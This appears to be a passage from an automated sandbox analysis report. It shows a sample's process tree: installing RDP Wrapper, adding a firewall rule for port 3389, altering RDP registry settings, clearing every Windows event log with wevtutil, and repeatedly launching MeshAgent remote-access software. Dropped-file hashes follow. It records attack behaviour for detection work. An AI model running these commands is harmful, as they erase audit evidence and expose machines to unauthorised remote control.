                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                    ping -n 1 google.com
                                                                                                                    4⤵
                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    • Runs ping.exe
                                                                                                                    PID:396
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                    4⤵
                                                                                                                      PID:3636
                                                                                                                      • C:\Windows\system32\cscript.exe
                                                                                                                        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                        5⤵
                                                                                                                        • Blocklisted process makes network request
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        PID:1696
                                                                                                                    • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
                                                                                                                      4⤵
                                                                                                                      • Server Software Component: Terminal Services DLL
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:3336
                                                                                                                      • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                        netsh advfirewall firewall delete rule name="Remote Desktop"
                                                                                                                        5⤵
                                                                                                                        • Modifies Windows Firewall
                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                        PID:3096
                                                                                                                    • C:\Program Files\RDP Wrapper\RDPWInst.exe
                                                                                                                      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i
                                                                                                                      4⤵
                                                                                                                      • Server Software Component: Terminal Services DLL
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Modifies WinLogon
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      PID:4332
                                                                                                                      • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                        5⤵
                                                                                                                        • Modifies Windows Firewall
                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                        PID:3704
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
                                                                                                                      4⤵
                                                                                                                        PID:944
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
                                                                                                                        4⤵
                                                                                                                          PID:448
                                                                                                                        • C:\Windows\system32\findstr.exe
                                                                                                                          findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
                                                                                                                          4⤵
                                                                                                                            PID:1488
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
                                                                                                                        2⤵
                                                                                                                          PID:1568
                                                                                                                      • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                        "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:2696
                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                          wmic SystemEnclosure get ChassisTypes
                                                                                                                          2⤵
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4384
                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                          wmic os get oslanguage /FORMAT:LIST
                                                                                                                          2⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1432
                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                          2⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4772
                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                          wmic os get oslanguage /FORMAT:LIST
                                                                                                                          2⤵
                                                                                                                            PID:3960
                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                            wmic SystemEnclosure get ChassisTypes
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:1728
                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:4600
                                                                                                                        • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                          "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:3516
                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                            wmic SystemEnclosure get ChassisTypes
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:1904
                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                            wmic os get oslanguage /FORMAT:LIST
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:4508
                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:1484
                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                            wmic SystemEnclosure get ChassisTypes
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:2468
                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                            2⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:2288
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                          1⤵
                                                                                                                            PID:2468
                                                                                                                          • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                            "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:2888
                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                              wmic SystemEnclosure get ChassisTypes
                                                                                                                              2⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4068
                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                              wmic os get oslanguage /FORMAT:LIST
                                                                                                                              2⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:3528
                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                              wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                              2⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:2452
                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                              wmic SystemEnclosure get ChassisTypes
                                                                                                                              2⤵
                                                                                                                                PID:1944
                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:3328
                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                              C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                              1⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:1868
                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                              C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                              1⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:3648
                                                                                                                            • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                              "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:2156
                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                wmic SystemEnclosure get ChassisTypes
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:3084
                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                wmic os get oslanguage /FORMAT:LIST
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1080
                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4532
                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                wmic SystemEnclosure get ChassisTypes
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1480
                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                2⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1972
                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                              C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                              1⤵
                                                                                                                                PID:4508
                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                1⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:2020
                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                1⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:1780
                                                                                                                              • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                PID:456
                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                  wmic SystemEnclosure get ChassisTypes
                                                                                                                                  2⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:3472
                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                  wmic os get oslanguage /FORMAT:LIST
                                                                                                                                  2⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:452
                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                  2⤵
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:3840
                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                  wmic SystemEnclosure get ChassisTypes
                                                                                                                                  2⤵
                                                                                                                                    PID:5116
                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                    2⤵
                                                                                                                                      PID:2288
                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                    1⤵
                                                                                                                                      PID:3360
                                                                                                                                    • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                      "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:3796
                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                        wmic SystemEnclosure get ChassisTypes
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4792
                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                        wmic os get oslanguage /FORMAT:LIST
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:3632
                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:468
                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                        wmic SystemEnclosure get ChassisTypes
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:1120
                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                        2⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:852
                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                      1⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:1292
                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                      C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                      1⤵
                                                                                                                                        PID:3116
                                                                                                                                      • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                        "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:2960
                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                          wmic SystemEnclosure get ChassisTypes
                                                                                                                                          2⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:3480
                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                          wmic os get oslanguage /FORMAT:LIST
                                                                                                                                          2⤵
                                                                                                                                            PID:1080
                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                            2⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:3632
                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                            wmic SystemEnclosure get ChassisTypes
                                                                                                                                            2⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:468
                                                                                                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                            2⤵
                                                                                                                                              PID:5052
                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                            C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                            1⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:5072
                                                                                                                                          • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                            "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:3576
                                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                              wmic SystemEnclosure get ChassisTypes
                                                                                                                                              2⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:5068
                                                                                                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                              wmic os get oslanguage /FORMAT:LIST
                                                                                                                                              2⤵
                                                                                                                                                PID:4672
                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1908
                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                wmic SystemEnclosure get ChassisTypes
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4968
                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4600
                                                                                                                                            • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                              "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              PID:4460
                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                wmic SystemEnclosure get ChassisTypes
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4220
                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1440
                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:4448
                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                wmic SystemEnclosure get ChassisTypes
                                                                                                                                                2⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1456
                                                                                                                                              • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                2⤵
                                                                                                                                                  PID:4792
                                                                                                                                              • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:3960
                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                  wmic SystemEnclosure get ChassisTypes
                                                                                                                                                  2⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3904
                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                  wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                  2⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:4092
                                                                                                                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3332
                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                    wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1092
                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                    wmic SystemEnclosure get ChassisTypes
                                                                                                                                                    2⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1248
                                                                                                                                                  • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1740
                                                                                                                                                  • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                    "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:1324
                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                      wmic SystemEnclosure get ChassisTypes
                                                                                                                                                      2⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:452
                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                      wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                      2⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4124
                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                      2⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:1396
                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                      wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                      2⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:1636
                                                                                                                                                    • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                      wmic SystemEnclosure get ChassisTypes
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2288
                                                                                                                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                        wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2004
                                                                                                                                                      • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                                                                                                                        "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                                                                                                                        1⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:1180
                                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                          wmic SystemEnclosure get ChassisTypes
                                                                                                                                                          2⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:4928
                                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                          wmic os get oslanguage /FORMAT:LIST
                                                                                                                                                          2⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:972
                                                                                                                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                                                                                                                          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                                                                                                                          2⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:852

                                                                                                                                                      Network

                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\Program Files (x86)\Mesh Agent\MeshAgent.db

                                                                                                                                                              Filesize

                                                                                                                                                              153KB

                                                                                                                                                              MD5

                                                                                                                                                              53ef749dc424e94a076e2074ebeff0b2

                                                                                                                                                              SHA1

                                                                                                                                                              cb14c75b2ac92b2fb58e4d51d9d2e072532bf889

                                                                                                                                                              SHA256

                                                                                                                                                              f4ada6ec674c1ef6c561f41a105938f35bd2409801f5c1db3905dcaf4a826e75

                                                                                                                                                              SHA512

                                                                                                                                                              d023892c00e35c36de10990b6d9f087945f9eb415f67ec3db8fb45889c9c55181b3ceb55214f33c1fc4399655b8df7b8d31f5d0a2569b9dbb8b52843935b2561

                                                                                                                                                            • C:\Program Files (x86)\Mesh Agent\MeshAgent.db

                                                                                                                                                              Filesize

                                                                                                                                                              389KB

                                                                                                                                                              MD5

                                                                                                                                                              b02687f97be8af559150773eb90de5c3

                                                                                                                                                              SHA1

                                                                                                                                                              70b214a2123df7f994489d9fcc1201fdbfeef34e

                                                                                                                                                              SHA256

                                                                                                                                                              3614e20718cbc11ba57a852a816130fac0eee513483761d3e5316357a7811e6b

                                                                                                                                                              SHA512

                                                                                                                                                              6de3e1878d3dfa0015e85a31fddd2f4a33ae24e7151ebe054864582e858fca0ef263292c8132da87e90dab5ff08b5bc78b1864450cdcb8d53a50a51b2b4abb09

                                                                                                                                                            • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe

                                                                                                                                                              Filesize

                                                                                                                                                              3.7MB

                                                                                                                                                              MD5

                                                                                                                                                              9065d79fe0436283f3957106d9c53700

                                                                                                                                                              SHA1

                                                                                                                                                              9edef111e8ce820573c5ea8b22939ad9e105b9b7

                                                                                                                                                              SHA256

                                                                                                                                                              94fe946df0fdde2138394d7ec4437b7030600d3139ed7b96602466d4ba3c7535

                                                                                                                                                              SHA512

                                                                                                                                                              4957784f6054fe73b4960fb89d5ce384bdaa7c8e2faee4f2cb7ff80fdf1f45370b450709be4671c3fbe7dab432f3447a03e568f4d31401d5542a2084667a5219

                                                                                                                                                            • C:\Program Files (x86)\Mesh Agent\MeshAgent.log

                                                                                                                                                              Filesize

                                                                                                                                                              334B

                                                                                                                                                              MD5

                                                                                                                                                              b09272b8dac731ecd3c01c362dc6b690

                                                                                                                                                              SHA1

                                                                                                                                                              93245d763815d7f42de33e56ef57cabc8e772e59

                                                                                                                                                              SHA256

                                                                                                                                                              038932396296ed84508ffe94891c6251051f79733f54c7b5b35beedd7f9d2673

                                                                                                                                                              SHA512

                                                                                                                                                              a71541fd3f5035902ce07f5ee059043b300198d824d0c80fa55474b65e57ea1f31dcdf0c4b5d981a637724d016f4d6c57e08e070302b4cbd7fdb5752170fe631

                                                                                                                                                            • C:\Program Files (x86)\Mesh Agent\MeshAgent.log

                                                                                                                                                              Filesize

                                                                                                                                                              501B

                                                                                                                                                              MD5

                                                                                                                                                              676268cbf9749c129096c37e21470b36

                                                                                                                                                              SHA1

                                                                                                                                                              0b88725bc9f0b437046b1c329711048f1cca9ef9

                                                                                                                                                              SHA256

                                                                                                                                                              47698c3a9a14199c3b5b697733f09603e2895a8acd7cb8fc181d0a896bdd8455

                                                                                                                                                              SHA512

                                                                                                                                                              f312661195b659ad7b718be55870b31c27ee0451a83f4518613951da0789987562bc3bda448aa6af619bcdb61377a214c0ffc0597ea4b4ea4d39405d4ca23263

                                                                                                                                                            • C:\Program Files (x86)\Mesh Agent\MeshAgent.log

                                                                                                                                                              Filesize

                                                                                                                                                              668B

                                                                                                                                                              MD5

